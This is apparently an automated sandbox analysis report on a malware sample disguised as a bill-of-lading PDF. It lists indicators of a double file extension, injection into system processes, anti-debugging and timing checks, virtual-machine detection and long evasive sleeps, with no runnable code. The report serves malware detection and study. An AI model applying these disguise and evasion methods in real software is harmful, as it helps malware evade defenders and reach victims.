            Hooking and other Techniques for Hiding and Protection

            Source: Possible double extension: pdf.exe -- Static PE information: Bill Of Lading_MEDUVB935991.pdf.exe
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed -- 0_2_004772DE
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput -- 0_2_004375B0
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exe -- Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_00444078 -- 0_2_00444078
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- API/Special instruction interceptor: Address: 402365C
            Source: C:\Windows\SysWOW64\write.exe -- API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\write.exe -- API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\write.exe -- API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\write.exe -- API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\write.exe -- API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\write.exe -- API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\write.exe -- API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\write.exe -- API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C7096E rdtsc -- 1_2_03C7096E
            Source: C:\Windows\SysWOW64\write.exe -- Window / User API: threadDelayed 5132
            Source: C:\Windows\SysWOW64\write.exe -- Window / User API: threadDelayed 4840
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes -- graph_0-84635
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep -- graph_0-83633
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- API coverage: 3.0 %
            Source: C:\Windows\SysWOW64\svchost.exe -- API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\write.exe -- API coverage: 3.0 %
            Source: C:\Windows\SysWOW64\write.exe TID: 3236 -- Thread sleep count: 5132 > 30
            Source: C:\Windows\SysWOW64\write.exe TID: 3236 -- Thread sleep time: -10264000s >= -30000s
            Source: C:\Windows\SysWOW64\write.exe TID: 3236 -- Thread sleep count: 4840 > 30
            Source: C:\Windows\SysWOW64\write.exe TID: 3236 -- Thread sleep time: -9680000s >= -30000s
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe TID: 4040 -- Thread sleep time: -70000s >= -30000s
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe TID: 4040 -- Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe TID: 4040 -- Thread sleep time: -57000s >= -30000s
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe TID: 4040 -- Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe TID: 4040 -- Thread sleep time: -38000s >= -30000s
            Source: C:\Windows\SysWOW64\write.exe -- Last function: Thread delayed
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose -- 0_2_00452126
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose -- 0_2_0045C999
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose -- 0_2_00436ADE
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose -- 0_2_00434BEE
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle -- 0_2_00436D2D
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose -- 0_2_00442E1F
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_0045DD7C FindFirstFileW,FindClose -- 0_2_0045DD7C
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose -- 0_2_0044BD29
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf -- 0_2_00475FE5
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose -- 0_2_0044BF8D
            Source: C:\Windows\SysWOW64\write.exe -- Code function: 6_2_023CC300 FindFirstFileW,FindNextFileW,FindClose -- 6_2_023CC300
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo -- 0_2_0040E470
            Source: gNKNuXuipEBZec.exe, 00000007.00000002.4198012088.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
            Source: write.exe, 00000006.00000002.4197383900.0000000002885000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
            Source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000002.1753904169.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: c18-806e6f6e6963}#0000000007500000#{f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C22
            Source: firefox.exe, 00000008.00000002.2484909615.00000206B7D0D000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- API call chain: ExitProcess graph end node -- graph_0-83306
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- API call chain: ExitProcess graph end node -- graph_0-83185
            Source: C:\Windows\SysWOW64\svchost.exe -- Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe -- Process queried: DebugPort
            Source: C:\Windows\SysWOW64\write.exe -- Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C7096E rdtsc -- 1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_00417703 LdrLoadDll -- 1_2_00417703
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_0045A259 BlockInput -- 0_2_0045A259
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW -- 0_2_0040D6D0
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress -- 0_2_0040EB70
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_04022278 mov eax, dword ptr fs:[00000030h] -- 0_2_04022278
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_040238C8 mov eax, dword ptr fs:[00000030h] -- 0_2_040238C8
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_04023928 mov eax, dword ptr fs:[00000030h] -- 0_2_04023928
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h] -- 1_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] -- 1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] -- 1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h] -- 1_2_03CB63C0
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] -- 1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h] -- 1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h] -- 1_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] -- 1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] -- 1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h] -- 1_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] -- 1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h] -- 1_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] -- 1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] -- 1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] -- 1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h] -- 1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h] -- 1_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h] -- 1_2_03CD8350
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03D0634F mov eax, dword ptr fs:[00000030h] -- 1_2_03D0634F
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h] -- 1_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h] -- 1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h] -- 1_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h] -- 1_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h] -- 1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03D08324 mov ecx, dword ptr fs:[00000030h] -- 1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] -- 1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03D062D6 mov eax, dword ptr fs:[00000030h] -- 1_2_03D062D6
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h] -- 1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h] -- 1_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h] -- 1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h] -- 1_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] -- 1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h] -- 1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h] -- 1_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h] -- 1_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03D0625D mov eax, dword ptr fs:[00000030h] -- 1_2_03D0625D
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h] -- 1_2_03C2A250
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h] -- 1_2_03C36259
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h] -- 1_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h] -- 1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h] -- 1_2_03C2826B
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] -- 1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h]1_2_03C2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h]1_2_03D061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h]1_2_03C601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h]1_2_03C70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h]1_2_03C2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h]1_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h]1_2_03CF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h]1_2_03C60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h]1_2_03CB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03C2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h]1_2_03C380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h]1_2_03CB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03C2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h]1_2_03C720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h]1_2_03C3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C280A0 mov eax, dword ptr fs:[00000030h]1_2_03C280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h]1_2_03CC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h]1_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h]1_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h]1_2_03CB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h]1_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h]1_2_03CB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A020 mov eax, dword ptr fs:[00000030h]1_2_03C2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C020 mov eax, dword ptr fs:[00000030h]1_2_03C2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6030 mov eax, dword ptr fs:[00000030h]1_2_03CC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB07C3 mov eax, dword ptr fs:[00000030h]1_2_03CB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03CBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD678E mov eax, dword ptr fs:[00000030h]1_2_03CD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C307AF mov eax, dword ptr fs:[00000030h]1_2_03C307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE47A0 mov eax, dword ptr fs:[00000030h]1_2_03CE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov esi, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30750 mov eax, dword ptr fs:[00000030h]1_2_03C30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE75D mov eax, dword ptr fs:[00000030h]1_2_03CBE75D
